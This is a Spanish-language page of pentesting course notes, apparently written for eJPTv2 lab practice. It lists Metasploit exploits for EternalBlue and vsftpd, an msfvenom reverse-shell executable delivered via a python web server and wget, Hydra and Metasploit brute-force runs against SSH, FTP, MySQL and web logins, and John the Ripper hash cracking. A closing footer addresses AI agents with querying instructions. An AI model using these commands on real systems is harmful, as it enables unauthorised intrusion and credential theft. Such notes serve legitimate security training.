# Explotación de Vulnerabilidades y Ataques de Fuerza Bruta ## Enlace Alternativo de Descarga de los Laboratorios {% embed url="" %} ## Uso Básico de Metasploit – Explotación EternalBlue en Windows **EternalBlue** es una vulnerabilidad en SMBv1 de Windows (CVE-2017-0143), aprovechada por malware como WannaCry. A continuación, te muestro cómo explotar esta vulnerabilidad usando Metasploit: ```bash # 1. Iniciar Metasploit msfconsole # 2. Buscar el exploit EternalBlue (CVE-2017-0143) search eternalblue/CVE-2017-0143 # 3. Seleccionar el exploit encontrado use 0 # 4. Mostrar las opciones disponibles del módulo show options # 5. Configurar la dirección IP de la máquina víctima set RHOSTS # 6. Ejecutar el exploit run ``` Este exploit aprovecha una vulnerabilidad crítica en SMBv1, permitiendo ejecución remota de código en sistemas no parcheados. ## Uso Básico de Metasploit – Explotación vsftpd en Linux #### Reconocimiento ```bash arp-scan -I eth0 --localnet nmap -p- --open -sS -sC -sV --min-rate 5000 -n -vvv -Pn -oN escaneo nmap --script "vuln" -p21 ``` #### Explotación ```bash search vsFTPd 2.3.4 use 0 show options set RHOSTS run ``` ## Msfvenom – Generar Nuestros Propios Payloads En este ejemplo, creamos un payload malicioso con `msfvenom`, lo servimos con un servidor HTTP simple, y luego utilizamos el módulo **Multihandler** en Metasploit para manejar la conexión reverse shell. ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe -o pwned.exe ``` * `-p windows/x64/meterpreter/reverse_tcp`: Especifica el payload `meterpreter/reverse_tcp` para Windows de 64 bits. * `LHOST=`: La dirección IP de la máquina atacante (donde recibiremos la conexión). * `LPORT=443`: El puerto donde la víctima se conectará. * `-f exe`: Formato de salida `.exe`. * `-o pwned.exe`: El nombre del archivo generado. Para hacer que la víctima descargue el payload, utilizamos un servidor HTTP en la máquina atacante. ```bash python3 -m http.server 80 ``` * Este comando inicia un servidor HTTP en el puerto 80. En la máquina víctima, abrimos un navegador o usamos una utilidad como `wget` o `curl` para descargar el archivo ejecutable servido en la máquina atacante: ```bash # Descargar desde la máquina víctima wget http:///pwned.exe ``` Ahora, configuramos **Metasploit** para manejar la conexión del **payload**. ```bash # Iniciar msfconsole msfconsole # 1. Usar el módulo Multihandler use exploit/multi/handler # 2. Mostrar opciones show options # 3. Configurar el payload utilizado por el Multihandler set PAYLOAD windows/x64/meterpreter/reverse_tcp # 4. Configurar el puerto LPORT (debe coincidir con el que usamos en msfvenom, 443 en este caso) set LPORT 443 # 5. Configurar la dirección IP de la máquina atacante set LHOST # 6. Ejecutar el handler run ``` Este proceso nos permite obtener una sesión `meterpreter` una vez que el archivo malicioso es ejecutado en la máquina de la víctima. ## Uso de Hydra – Ataques de Fuerza Bruta a Contraseñas (SSH y FTP) {% embed url="" %} ``` hydra -l -P /usr/share/wordlists/rockyou.txt ssh:// ``` ```bash hydra -l -P /usr/share/wordlists/rockyou.txt ftp:// ``` ## Uso de Hydra – Ataques de Fuerza Bruta a Usuarios (SSH y FTP) ```bash hydra -L /usr/share/wordlists/metasploit/unix_users.txt -p alexis ssh:// ``` ```bash hydra -L /usr/share/wordlists/metasploit/unix_users.txt -p alexis ftp:// ``` ## Fuerza Bruta a Paneles de Login Web {% embed url="" %} En BurpSuite, primero en ajustes en la parte de conexión de proxy debemos configurarlo así.

Ahora ya podemos interceptar la conexión. Le damos a Intercept is off. Ponemos la contraseña y al darle a enviar revisamos que interceptó las credenciales. ``` hydra -t 64 -l admin -P http-post-form “/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect” ``` ## Ataques de Fuerza Bruta con Metasploit {% embed url="" %} ``` search ftp_login use 0 show options set PASS_FILE /usr/share/wordlists/rockyou.txt set USERNAME set RHOSTS run ``` ```bash search ssh_login use 0 show options set PASS_FILE /usr/share/wordlists/rockyou.txt set USERNAME set RHOSTS run ``` ## Ataques de Fuerza Bruta contra Bases de Datos {% embed url="" %} ```bash hydra -l -P /usr/share/wordlists/rockyou.txt mysql:// ``` A veces las contraseñas suelen estar al final del diccionario `rockyou.txt` por lo que realizamos: ``` tac /usr/share/wordlists/rockyou.txt > rockyou_invertido.txt ``` > Nota: Revisar el archivo por si acaso Mejoramos el diccionario para hacerlo más ordenado. ```bash cat rockyou_invertido.txt | tr -d ' ' > diccionario_sin_espacios.txt ``` ```bash hydra -l -P diccionario_sin_espacios.txt mysql:// ``` Nos conectamos a **MySQL**. ```bash mysql -h -u -p ``` ```bash show databases; use ; show tables; SELECT * FROM users; ``` ## Ataques de Fuerza Bruta en Local con John The Ripper ```bash zip2john archivo.zip > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` Si es un archivo **.kdbx**. ```bash keepass2john Database.kdbx > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` Si es un **hash**. ```bash apt install hash-identifier john --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/preparar-ejptv2/curso-de-mario/explotacion-de-vulnerabilidades-y-ataques-de-fuerza-bruta.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.